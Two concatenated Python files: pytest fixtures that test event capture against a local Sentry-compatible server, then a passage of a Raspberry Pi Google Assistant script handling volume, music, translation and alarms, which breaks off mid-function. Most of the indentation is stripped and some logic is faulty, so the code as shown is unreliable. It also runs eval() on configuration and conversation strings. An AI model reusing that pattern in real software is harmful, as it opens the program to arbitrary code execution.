def testapp(app):
from webtest import TestApp
return TestApp(app)
@pytest.fixture
def troublebox_server(app):
from wsgiref.simple_server import make_server
import threading
host = 'localhost'
port = get_open_port(host)
server = make_server(host, port, app)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
wait_for_port(host, port, 5)
yield server
server.shutdown()
@pytest.fixture
def sentry_url(troublebox_server):
return "http://key@%s:%s/31415" % troublebox_server.server_address
@pytest.fixture
def sentry_raven_client(sentry_url):
from raven import Client
from raven.transport.http import HTTPTransport
return Client(sentry_url, transport=HTTPTransport)
@pytest.fixture
def sentry_sdk_client(sentry_url):
from sentry_sdk.client import Client
return Client(sentry_url)
def test_raven_capture_message(sentry_raven_client, testapp):
event_id = sentry_raven_client.captureMessage("foo")
result = testapp.get('/')
(item,) = result.html.select('td.event a')
assert event_id in item.text
def test_sdk_capture_event(sentry_sdk_client, testapp):
event_id = sentry_sdk_client.capture_event(
{"message": "foo", "level": "info"})
sentry_sdk_client.transport._worker.flush(1)
result = testapp.get('/')
(item,) = result.html.select('td.event a')
assert event_id in item.text
|
main.py
|
import os
import time
import json
import yaml
import psutil
import random
import difflib
import datetime
import argparse
import requests
import traceback
import threading
import subprocess
import mediaplayer
import pathlib2 as pathlib
import google.oauth2.credentials
import google.auth.transport.requests
from gtts import gTTS
from googletrans import Translator
from google.assistant.library import Assistant
from google.assistant.library.event import EventType
from google.assistant.library.file_helpers import existing_file
from google.assistant.library.device_helpers import register_device
# Device registration endpoint used by the register_device() method below
# (assumed value, taken from the Google Assistant SDK samples).
DEVICE_API_URL = 'https://embeddedassistant.googleapis.com/v1alpha2'
settings_file = open(os.path.expanduser("~/google-assistant/src/settings.yaml"), "r")
settings = settings_file.read()
settings = yaml.safe_load(settings)
settings_file.close()
if settings.get("Led strips"):
import flux_led
if settings.get("Sense hat"):
from sense_hat import SenseHat
hat = SenseHat()
hat.low_light = True
hat.clear()
if settings.get("Lcd screen"):
from PIL import Image
from PIL import ImageOps
from PIL import ImageDraw
from PIL import ImageFont
from RPi import GPIO
import Adafruit_SSD1306
bsquare = int(settings.get("Square button"))
bround = int(settings.get("Round button"))
brigt = int(settings.get("Right button"))
bleft = int(settings.get("Left button"))
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(bsquare, GPIO.OUT)
GPIO.setup(bround, GPIO.OUT)
GPIO.setup(brigt, GPIO.OUT)
GPIO.setup(bleft, GPIO.OUT)
GPIO.output(bsquare, GPIO.HIGH)
GPIO.output(bround, GPIO.HIGH)
GPIO.output(brigt, GPIO.HIGH)
GPIO.output(bleft, GPIO.HIGH)
font = ImageFont.load_default()
disp = Adafruit_SSD1306.SSD1306_128_64(rst = 0)
disp.begin()
disp.reset()
disp.dim(True)
disp.set_contrast(1)
disp.clear()
disp.display()
if settings.get("Weather"):
from forecastiopy import *
apikey = settings.get('Apikey')
coutry = str(settings.get('Location')).split(',')
coutry[0] = float(coutry[0])
coutry[1] = float(coutry[1])
fio = ForecastIO.ForecastIO(apikey,units='ca',latitude=coutry[1],longitude=coutry[0])
vlc = mediaplayer.vlcplayer()
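# Myassistant wires Google Assistant library events to the local features
# enabled in settings.yaml (VLC music/radio playback, alarms, translation,
# volume control, optional Sense HAT / LCD output). Scheduled actions are
# kept in self.act_cron as [weekday-or-'-', hour, minute, python-statement]
# entries and restored from save.yaml on start-up.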
class Myassistant():
def __init__(self):
        var_save_file = open(os.path.expanduser("~/google-assistant/src/save.yaml"), "r")
        self.var_save = var_save_file.read()
        self.var_save = yaml.safe_load(self.var_save)
        var_save_file.close()
self.al = False
self.buton = []
self.veil = settings.get("Time stand by")*2+1
self.tink = []
self.affichage = 'heure'
        self.text_say = 'Sorry I do not remember'
self.act_cron = [[str(self.var_save.get("Music stop").split(',')[0]), str(self.var_save.get("Music stop").split(',')[1]), str(self.var_save.get("Music stop").split(',')[2]), 'vlc.stop_vlc()#cantdel']]
if settings.get("Network constraint"):
self.act_cron.append(['-',str(settings.get("Start of conection").split(',')[0]),str(settings.get("Start of conection").split(',')[1]),'os.system("sudo systemctl restart google-assistant-ok-google.service")#cantdel'])
m = str(settings.get("End of conection").split(',')[1])
h = str(settings.get("End of conection").split(',')[0])
if m == '00':
m = '59'
h = Myassistant.remove_hour(h,1)
else:
m = Myassistant.remove_min(m,1)
self.act_cron.append(['-',str(h),str(m),'self.assistant.set_mic_mute(True)#cantdel'])
if not settings.get("Add actions in crontab") == None:
for apl in settings.get("Add actions in crontab"):
self.act_cron.append(apl)
if not self.var_save.get("Alarm cron") == 'None':
for apl in self.var_save.get("Alarm cron"):
self.act_cron.append(apl)
def process_event(self,event):
print('\n'+str(event))
if 'ON_CONVERSATION_TURN_STARTED' in str(event):
if self.al == True:
self.al = False
os.system('sudo killall mpg123')
vlc.pause_vlc()
threading.Thread(target=Myassistant.sound,args=()).start()
if settings.get("Sense hat"):
threading.Thread(target=Myassistant.logo,args=()).start()
if not Myassistant.have_network(time.strftime("%H"),time.strftime("%M")):
if settings.get("Sense hat"):
Myassistant.logo_low()
vlc.resume_vlc()
if 'ON_RESPONDING_STARTED' in str(event):
vlc.pause_vlc()
if settings.get("Sense hat"):
Myassistant.logo_low()
Myassistant.logo_high()
if 'ON_ALERT_STARTED' in str(event):
vlc.pause_vlc()
if settings.get("Sense hat"):
Myassistant.logo_high()
if 'ON_ALERT_FINISHED' in str(event):
vlc.resume_vlc()
if settings.get("Sense hat"):
Myassistant.logo_low()
if 'ON_CONVERSATION_TURN_TIMEOUT' in str(event):
if settings.get("Sense hat"):
Myassistant.logo_low()
vlc.resume_vlc()
if 'ON_CONVERSATION_TURN_FINISHED' in str(event):
if settings.get("Sense hat"):
Myassistant.logo_low()
vlc.resume_vlc()
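    # Looks up this device id in the Assistant device registry and registers
    # it as an SDK_LIBRARY device if the lookup returns 404.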
def register_device(self,project_id, credentials, device_model_id, device_id):
base_url = '/'.join([DEVICE_API_URL, 'projects', project_id, 'devices'])
device_url = '/'.join([base_url, device_id])
session = google.auth.transport.requests.AuthorizedSession(credentials)
r = session.get(device_url)
print(device_url, r.status_code)
if r.status_code == 404:
print('Registering....')
r = session.post(base_url, data=json.dumps({
'id': device_id,
'model_id': device_model_id,
'client_type': 'SDK_LIBRARY'
}))
if r.status_code != 200:
if settings.get("Sense hat"):
Myassistant.logo_high()
raise Exception('failed to register device: ' + r.text)
if settings.get("Sense hat"):
Myassistant.logo_low()
print('\rDevice registered.')
def main(self):
parser = argparse.ArgumentParser(
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('--device-model-id', '--device_model_id', type=str,
metavar='DEVICE_MODEL_ID', required=False,
help='the device model ID registered with Google')
parser.add_argument('--project-id', '--project_id', type=str,
metavar='PROJECT_ID', required=False,
help='the project ID used to register this device')
parser.add_argument('--device-config', type=str,
metavar='DEVICE_CONFIG_FILE',
default=os.path.join(
os.path.expanduser('~/.config'),
'googlesamples-assistant',
'device_config_library.json'
),
help='path to store and read device configuration')
parser.add_argument('--credentials', type=existing_file,
metavar='OAUTH2_CREDENTIALS_FILE',
default=os.path.join(
os.path.expanduser('~/.config'),
'google-oauthlib-tool',
'credentials.json'
),
help='path to store and read OAuth2 credentials')
parser.add_argument('-v', '--version', action='version',
version='%(prog)s ' + Assistant.__version_str__())
args = parser.parse_args()
with open(args.credentials, 'r') as f:
credentials = google.oauth2.credentials.Credentials(token=None,
**json.load(f))
device_model_id = None
last_device_id = None
try:
with open(args.device_config) as f:
device_config = json.load(f)
device_model_id = device_config['model_id']
last_device_id = device_config.get('last_device_id', None)
except FileNotFoundError:
pass
should_register = (
args.device_model_id and args.device_model_id != device_model_id)
device_model_id = self.var_save.get("Model id")
with Assistant(credentials, device_model_id) as assistant:
self.assistant = assistant
if settings.get("Lcd screen"):
Myassistant.reload_aff_heure_st(self)
Myassistant.main_heure(self)
events = assistant.start()
device_id = assistant.device_id
if should_register or (device_id != last_device_id):
if args.project_id:
register_device(args.project_id, credentials,
device_model_id, device_id)
pathlib.Path(os.path.dirname(args.device_config)).mkdir(
exist_ok=True)
with open(args.device_config, 'w') as f:
json.dump({
'last_device_id': device_id,
'model_id': device_model_id,
}, f)
self.assistant.set_mic_mute(False)
for event in events:
self.process_event(event)
brusrcmd = event.args
if event.type == EventType.ON_RECOGNIZING_SPEECH_FINISHED:
usrcmd = event.args
else:
usrcmd = {}
if event.type == EventType.ON_RECOGNIZING_SPEECH_FINISHED:
actionev = []
act = str(brusrcmd).lower()
act = act.split(": ")
act = act[1]
r = 0
while r > -1 :
if r == len(act) :
r = -1
else :
actionev.append(act[r].lower())
r = r + 1
del actionev[0]
del actionev[len(act) - 2]
del actionev[len(act) - 3]
act = "".join(actionev)
actionev = act.split(" ")
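                # ON_RENDER_RESPONSE: recover the assistant's spoken reply from the
                # event's string representation so it can later be repeated or translated.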
if event.type == EventType.ON_RENDER_RESPONSE:
self.text_say = ()
act = str(brusrcmd).lower()
if not '"' in act :
act = act.split("'")
i = len(act) - 1
while i > -1 :
if not 'renderresponsetype.text' in act[i] and not '}' in act[i] and not '{' in act[i] and not ':' in act[i] and not "'text'" in act[i] and not "'type'" in act[i] and not "'type'" in act[i] and not act[i] == 'text' and not act[i] == 'type' and not act[i] == ', ':
act = act[i]
i = -1
i = i - 1
else:
act = act.split('"')
i = len(act) - 1
while i > -1 :
if not 'renderresponsetype.text' in act[i] and not '}' in act[i] and not '{' in act[i] and not ':' in act[i] and not "'text'" in act[i] and not "'type'" in act[i] and not "'type'" in act[i] and not act[i] == 'text' and not act[i] == 'type' and not act[i] == ', ':
act = act[i]
i = -1
i = i - 1
self.text_say = act
if event.type == EventType.ON_RECOGNIZING_SPEECH_FINISHED:
if settings.get("Command voice"):
for command in settings.get("Command configuration"):
if command[0] in str(usrcmd).lower():
for execut in command[1]:
try:
eval(execut)
except:
print('Failed to execute "'+execut+'"')
if settings.get("Translation"):
if 'repeat in' in str(usrcmd).lower() or 'translation' in self.tink:
assistant.stop_conversation()
i = len(settings.get("Languages")) - 1
ood = True
while i > -1:
if settings.get("Languages")[i][0].lower() in str(usrcmd).lower():
ood = False
Myassistant.say(self, Myassistant.trans(Myassistant.alpha(self.text_say),settings.get("Languages")[i][1]), settings.get("Languages")[i][1])
i = i - 1
if ood == True:
if 'translation' in self.tink:
del self.tink[self.tink.index('translation')]
Myassistant.say(self, "Sorry, I don't understand.", 'en')
else:
self.tink.append('translation')
Myassistant.say(self, 'Repeat in what ?', 'en',False)
assistant.start_conversation()
elif 'translation' in self.tink:
del self.tink[self.tink.index('translation')]
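                    # Voice volume control, handled locally through the
                    # Myassistant.volume_get()/volume_set() helpers.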
if settings.get("Volume"):
if 'volume' in str(usrcmd).lower() or 'volume' in self.tink:
assistant.stop_conversation()
epo = True
if 'up' in str(usrcmd).lower():
assistant.stop_conversation()
Myassistant.volume_set(int(Myassistant.volume_get())+5)
elif 'down' in str(usrcmd).lower():
assistant.stop_conversation()
Myassistant.volume_set(int(Myassistant.volume_get())-5)
elif 'maximum' in str(usrcmd).lower():
assistant.stop_conversation()
Myassistant.volume_set(100)
elif 'minimum' in str(usrcmd).lower():
assistant.stop_conversation()
Myassistant.volume_set(0)
elif 'get' in str(usrcmd).lower():
assistant.stop_conversation()
Myassistant.say(self,"the volume is at "+str(int(Myassistant.volume_get()))+'%', 'en')
                            elif 'softer' in str(usrcmd).lower():
                                assistant.stop_conversation()
                                Myassistant.volume_set(int(Myassistant.volume_get())-5)
                            elif 'louder' in str(usrcmd).lower():
                                assistant.stop_conversation()
                                Myassistant.volume_set(int(Myassistant.volume_get())+5)
elif '%' in str(usrcmd).lower():
assistant.stop_conversation()
try:
yytr = str(usrcmd).lower().index('%')
oppm = []
ppg = True
while ppg:
yytr = yytr - 1
if str(usrcmd).lower()[yytr] == ' ':
ppg = False
else:
oppm.append(str(usrcmd).lower()[yytr])
oppm.reverse()
ll = "".join(oppm)
ll = int(ll)
Myassistant.volume_set(ll)
except:
pass
elif 'volume' in self.tink:
assistant.stop_conversation()
del self.tink[self.tink.index('volume')]
Myassistant.say(self, "Sorry, I don't understand.", 'en')
else:
epo = False
assistant.stop_conversation()
self.tink.append('volume')
Myassistant.say(self, "What do you want to do with the volume ?", 'en')
assistant.start_conversation()
if epo:
if 'volume' in self.tink:
del self.tink[self.tink.index('volume')]
                        elif 'softer' in str(usrcmd).lower():
                            assistant.stop_conversation()
                            Myassistant.volume_set(int(Myassistant.volume_get())-5)
                        elif 'louder' in str(usrcmd).lower():
                            assistant.stop_conversation()
                            Myassistant.volume_set(int(Myassistant.volume_get())+5)
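                    # Local music/radio playback: stop/next/previous are routed to the
                    # VLC wrapper, radios come from settings, and anything else is matched
                    # against files or folders under "Path to your music".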
if settings.get("Music"):
if str(usrcmd).lower() == "{'text': 'stop'}" and vlc.is_vlc_playing():
assistant.stop_conversation()
vlc.stop_vlc()
if str(usrcmd).lower() == "{'text': 'previous'}" in str(usrcmd).lower() and vlc.is_vlc_playing():
assistant.stop_conversation()
vlc.previous_vlc()
if str(usrcmd).lower() == "{'text': 'next'}" in str(usrcmd).lower() and vlc.is_vlc_playing():
assistant.stop_conversation()
vlc.next_vlc()
if 'music' in str(usrcmd).lower() or 'play' in str(usrcmd).lower() or 'song' in str(usrcmd).lower() or 'track' in str(usrcmd).lower():
assistant.stop_conversation()
if 'previous' in str(usrcmd).lower() and vlc.is_vlc_playing():
assistant.stop_conversation()
vlc.previous_vlc()
if 'next' in str(usrcmd).lower() and vlc.is_vlc_playing():
assistant.stop_conversation()
vlc.next_vlc()
if 'stop' in str(usrcmd).lower() and vlc.is_vlc_playing():
assistant.stop_conversation()
vlc.stop_vlc()
if 'play' in str(usrcmd).lower() or 'music' in str(usrcmd).lower():
i = len(settings.get("Radios")) - 1
while i > -1:
if settings.get("Radios")[i][0].lower() in str(usrcmd).lower():
assistant.stop_conversation()
Myassistant.say(self, Myassistant.yes() + ', ' + str(settings.get("Radios")[i][0]) + ' playback', 'en')
vlc.play_audio_file(str(settings.get("Radios")[i][1]))
i = -4
i = i - 1
if i == -1 and ('dj' in str(usrcmd).lower() or str(usrcmd).lower() == "{'text': 'music'}" or str(usrcmd).lower() == "{'text': 'play'}" or ('music' in str(usrcmd).lower() and 'play' in str(usrcmd).lower())):
assistant.stop_conversation()
Myassistant.say(self, Myassistant.yes() + ', music playback', 'en')
vlc.play_audio_folder(settings.get("Path to your music"))
elif i == -1:
mus = []
mus.extend(actionev)
if 'music' in mus :
mus.remove('music')
if 'play' in mus :
mus.remove('play')
chemin = Myassistant.cherchefichier(str(" ".join(mus)) + ".mp3",settings.get("Path to your music"))
y = True
if chemin!="" :
assistant.stop_conversation()
Myassistant.say(self, Myassistant.yes() + ', ' + str(" ".join(mus)) + ' playback', 'en')
vlc.play_audio_file(str(chemin) + "/" + str(" ".join(mus)) + ".mp3")
else:
for path, dirs, file in os.walk(settings.get("Path to your music")):
t = path.split("/")
if str(t[len(t)-1]) == str(" ".join(mus)):
assistant.stop_conversation()
Myassistant.say(self, Myassistant.yes() + ', ' + str(" ".join(mus)) + ' playback', 'en')
vlc.play_audio_folder(path)
y = False
if y == True:
lllf = []
for path, dirs, files in os.walk(settings.get("Path to your music")):
for file in files:
lllf.append([file,path + '/' + file])
for adir in dirs:
lllf.append([adir,path + '/' + adir])
jhg = []
for ggf in lllf:
jhg.append(ggf[0])
resultmotw = Myassistant.get_mots(str(" ".join(mus)) + ".mp3",jhg,2)
if not resultmotw == []:
assistant.stop_conversation()
kkj = lllf[jhg.index(resultmotw[0])][1]
if os.path.isdir(kkj):
Myassistant.say(self, Myassistant.yes() + ', ' + lllf[jhg.index(resultmotw[0])][0] + ' playback', 'en')
vlc.play_audio_folder(kkj)
else:
Myassistant.say(self, Myassistant.yes() + ', ' + lllf[jhg.index(resultmotw[0])][0].replace('.mp3','') + ' playback', 'en')
vlc.play_audio_file(kkj)
y = False
if settings.get("Alarm"):
uytpv = False
for e in self.tink:
if 'alarm' in e:
uytpv = True
if 'alarm' in str(usrcmd).lower() or uytpv:
assistant.stop_conversation()
alarm_option_add = ()
alarm_setting_add = []
alarm_time_add = ()
if 'set' in str(usrcmd).lower():
alarm_option_add = 'new'
elif 'remove' in str(usrcmd).lower() or 'del' in str(usrcmd).lower() or 'delete' in str(usrcmd).lower():
alarm_option_add = 'del'
elif 'enable' in str(usrcmd).lower():
alarm_option_add = 'enable'
elif 'disable' in str(usrcmd).lower():
alarm_option_add = 'disable'
else:
alarm_option_add = 'get'
today = ['-',str(time.strftime("%A"))]
listal = []
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
listal.append(self.act_cron[i])
i = i - 1
if 'monday' in str(usrcmd).lower():
alarm_setting_add.append('Monday')
if 'tuesday' in str(usrcmd).lower():
alarm_setting_add.append('Tuesday')
if 'wednesday' in str(usrcmd).lower():
alarm_setting_add.append('Wednesday')
if 'thursday' in str(usrcmd).lower():
alarm_setting_add.append('Thursday')
if 'friday' in str(usrcmd).lower():
alarm_setting_add.append('Friday')
if 'saturday' in str(usrcmd).lower():
alarm_setting_add.append('Saturday')
if 'sunday' in str(usrcmd).lower():
alarm_setting_add.append('Sunday')
if 'tomorrow' in str(usrcmd).lower():
alarm_setting_add.append(Myassistant.ad_day(time.strftime("%A"),1))
if 'today' in str(usrcmd).lower():
alarm_setting_add.append(time.strftime("%A"))
if 'all' in str(usrcmd).lower():
alarm_setting_add.append('all')
if 'in' in str(usrcmd).lower():
pass
else:
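                                # Parse a spoken time into [HH, MM]: keep the digits of each word,
                                # normalise to two fields and apply a 12-hour offset when 'pm' is heard.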
m = []
for word in actionev:
eds = []
for letter in word:
numb = '0123456789'
if letter in numb:
eds.append(letter)
if len(eds) == 1:
m.append('0'+eds[0])
elif len(eds) == 2:
m.append(eds[0]+eds[1])
if len(m) == 1:
m = [m[0],'00']
elif len(m) == 2:
m = [m[0],m[1]]
elif len(m) > 2:
m = [m[0],m[1]]
if not len(m) == 0:
if 'pm' in ' '.join(actionev):
                                        m[0] = str(int(m[0])+12)
if m[0] == '24':
m[0] = '00'
if m[1] == '60':
m[1] = '00'
if not (int(m[0]) > 23 or int(m[1]) > 59):
alarm_time_add = m
for e in self.tink:
if 'alarm' in e:
fg = eval(e.replace('alarm',''))
if fg[0] == 'new':
alarm_option_add = 'new'
if alarm_setting_add == []:
alarm_setting_add = fg[1]
elif fg[0] == 'del':
alarm_option_add = 'del'
elif fg[0] == 'disable':
alarm_option_add = 'disable'
elif fg[0] == 'enable':
alarm_option_add = 'enable'
if alarm_option_add == 'get':
if len(listal) == 0:
Myassistant.say(self, "You don't have any alarm", 'en')
elif len(listal) == 1:
if 'Myassistant.alarm_dring(self)#cantdel' in listal[0][3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == listal[0][3]:
if listal[0][0] in today:
if Myassistant.time_as_not_pass(listal[0][1],listal[0][2]):
Myassistant.say(self, 'You have 1 alarm disable for today at '+listal[0][1]+':'+listal[0][2], 'en')
else:
if listal[0][0] == '-':
Myassistant.say(self, 'You have 1 alarm disable for tomorrow at '+listal[0][1]+':'+listal[0][2], 'en')
else:
Myassistant.say(self, 'You have 1 alarm disable on '+listal[0][0]+' at '+listal[0][1]+':'+listal[0][2], 'en')
else:
Myassistant.say(self, 'You have 1 alarm disable on '+listal[0][0]+' at '+listal[0][1]+':'+listal[0][2], 'en')
else:
if listal[0][0] in today:
if Myassistant.time_as_not_pass(listal[0][1],listal[0][2]):
Myassistant.say(self, 'You have 1 alarm for today at '+listal[0][1]+':'+listal[0][2], 'en')
else:
if listal[0][0] == '-':
Myassistant.say(self, 'You have 1 alarm for tomorrow at '+listal[0][1]+':'+listal[0][2], 'en')
else:
Myassistant.say(self, 'You have 1 alarm on '+listal[0][0]+' at '+listal[0][1]+':'+listal[0][2], 'en')
else:
Myassistant.say(self, 'You have 1 alarm on '+listal[0][0]+' at '+listal[0][1]+':'+listal[0][2], 'en')
else:
if not len(alarm_setting_add) == 0:
if 'all' in alarm_setting_add:
f = ['You have '+str(len(listal))+' alarms']
for alar in listal:
if 'Myassistant.alarm_dring(self)#cantdel' in alar[3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == alar[3]:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm disable for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm disable for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm disable on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm disable on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
                                                                    f.append('an alarm for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
Myassistant.say(self, tr, 'en')
else:
listalchoice = []
for alar in listal:
if alar[0] in alarm_setting_add:
listalchoice.append(alar)
if listalchoice == []:
Myassistant.say(self, "You don't have any alarm in your choice", 'en')
elif len(listalchoice) == 1:
                                                if 'Myassistant.alarm_dring(self)#cantdel' in listalchoice[0][3]:
                                                    if 'Myassistant.alarm_dring(self)#cantdel#disable' == listalchoice[0][3]:
Myassistant.say(self, "You have 1 alarm disable on "+listalchoice[0][0]+" at "+listalchoice[0][1]+":"+listalchoice[0][2], 'en')
else:
Myassistant.say(self, "You have 1 alarm on "+listalchoice[0][0]+" at "+listalchoice[0][1]+":"+listalchoice[0][2], 'en')
else:
f = ['You have '+str(len(listalchoice))+' alarms in your choice']
for alar in listalchoice:
if 'Myassistant.alarm_dring(self)#cantdel' in alar[3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == alar[3]:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm disable for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm disable for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm disable on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm disable on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
                                                                        f.append('an alarm for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
Myassistant.say(self, tr, 'en')
elif not alarm_time_add == ():
listalchoice = []
for alar in listal:
if alar[1] == alarm_time_add[0] and alar[2] == alarm_time_add[1]:
listalchoice.append(alar)
if listalchoice == []:
Myassistant.say(self, "You don't have any alarm in your choice", 'en')
elif len(listalchoice) == 1:
                                            if 'Myassistant.alarm_dring(self)#cantdel' in listalchoice[0][3]:
                                                if 'Myassistant.alarm_dring(self)#cantdel#disable' == listalchoice[0][3]:
Myassistant.say(self, "You have 1 alarm disable on "+listalchoice[0][0]+" at "+listalchoice[0][1]+":"+listalchoice[0][2], 'en')
else:
Myassistant.say(self, "You have 1 alarm on "+listalchoice[0][0]+" at "+listalchoice[0][1]+":"+listalchoice[0][2], 'en')
else:
f = ['You have '+str(len(listalchoice))+' alarms in your choice']
for alar in listalchoice:
if 'Myassistant.alarm_dring(self)#cantdel' in alar[3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == alar[3]:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm disable for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm disable for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm disable on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm disable on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
                                                                    f.append('an alarm for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
Myassistant.say(self, tr, 'en')
else:
f = ['You have '+str(len(listal))+' alarms']
for alar in listal:
if 'Myassistant.alarm_dring(self)#cantdel' in alar[3]:
if 'Myassistant.alarm_dring(self)#cantdel#disable' == alar[3]:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm disable for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm disable for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm disable on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm disable on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
                                                                f.append('an alarm for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
Myassistant.say(self, tr, 'en')
elif alarm_option_add == 'new':
if not alarm_time_add == ():
if alarm_setting_add == []:
self.act_cron.append(['-',alarm_time_add[0],alarm_time_add[1],'Myassistant.alarm_dring(self)#cantdel'])
Myassistant.say(self, 'You have 1 new alarm at '+alarm_time_add[0]+':'+alarm_time_add[1], 'en')
elif len(alarm_setting_add) == 1:
                                        self.act_cron.append([alarm_setting_add[0],alarm_time_add[0],alarm_time_add[1],'Myassistant.alarm_dring(self)#cantdel'])
                                        Myassistant.say(self, 'You have 1 new alarm on '+alarm_setting_add[0]+' at '+alarm_time_add[0]+':'+alarm_time_add[1], 'en')
else:
f = ['You have '+str(len(alarm_setting_add))+' new alarms']
for dayb in alarm_setting_add:
self.act_cron.append([dayb,alarm_time_add[0],alarm_time_add[1],'Myassistant.alarm_dring(self)#cantdel'])
f.append('an alarm on '+dayb+' at '+alarm_time_add[0]+':'+alarm_time_add[1])
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
Myassistant.say(self, tr, 'en')
else:
jjfd = True
ttytrj = 0
for e in self.tink:
if 'alarm' in e:
jjfd = False
del self.tink[ttytrj]
else:
ttytrj = ttytrj + 1
if jjfd:
self.tink.append('alarm["new",'+str(alarm_setting_add)+']')
Myassistant.say(self, 'For when ?', 'en')
assistant.start_conversation()
else:
Myassistant.say(self, "Sorry, I don't understand.", 'en')
elif alarm_option_add == 'del':
if len(listal) == 0:
Myassistant.say(self, "You don't have any alarm", 'en')
elif len(listal) == 1:
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
del self.act_cron[i]
i = i - 1
                                    Myassistant.say(self, "Ok, your alarm has been removed", 'en')
else:
if alarm_time_add == ():
if alarm_setting_add == []:
jjfd = True
ttytrj = 0
for e in self.tink:
if 'alarm' in e:
jjfd = False
del self.tink[ttytrj]
else:
ttytrj = ttytrj + 1
if jjfd:
f = ['You have '+str(len(listal))+' alarms']
for alar in listal:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
uts = str(f[len(f)-1])
del f[len(f)-1]
tr = [", ".join(f),uts]
tr = " and ".join(tr)
tr = tr + '. What is your choice ?'
self.tink.append('alarm["del"]')
Myassistant.say(self, tr, 'en')
assistant.start_conversation()
else:
Myassistant.say(self, "Sorry, I don't understand.", 'en')
else:
if 'all' in alarm_setting_add:
i = len(self.act_cron)-1
while i > -1:
if 'Myassistant.alarm_dring(self)#cantdel' in self.act_cron[i][3]:
del self.act_cron[i]
i = i - 1
                                                Myassistant.say(self, "Ok, all alarms have been removed", 'en')
else:
listalchoice = []
for alar in listal:
if alar[0] in alarm_setting_add:
listalchoice.append(alar)
if listalchoice == []:
Myassistant.say(self, "You don't have any alarm in your choice", 'en')
elif len(listalchoice) == 1:
del self.act_cron[self.act_cron.index(listalchoice[0])]
Myassistant.say(self, "Ok, your alarm on "+listalchoice[0][0]+' at '+listalchoice[0][1]+':'+listalchoice[0][2]+' has been removed', 'en')
else:
f = ['Ok, '+str(len(listalchoice))+' alarms have been removed']
for alar in listalchoice:
if alar[0] in today:
if Myassistant.time_as_not_pass(alar[1],alar[2]):
f.append('an alarm for today at '+alar[1]+':'+alar[2])
else:
if alar[0] == '-':
f.append('an alarm for tomorrow at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
else:
f.append('an alarm on '+alar[0]+' at '+alar[1]+':'+alar[2])
